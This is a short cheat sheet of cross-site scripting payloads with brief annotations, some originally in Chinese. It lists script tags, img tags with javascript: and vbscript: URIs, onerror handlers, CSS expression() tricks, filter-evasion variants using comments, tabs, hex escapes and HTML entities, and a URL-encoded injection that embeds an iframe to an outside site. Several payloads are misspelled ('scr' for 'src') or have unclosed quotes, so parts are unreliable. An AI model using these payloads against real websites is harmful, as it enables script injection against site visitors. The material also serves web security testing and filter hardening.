<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace inserted with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["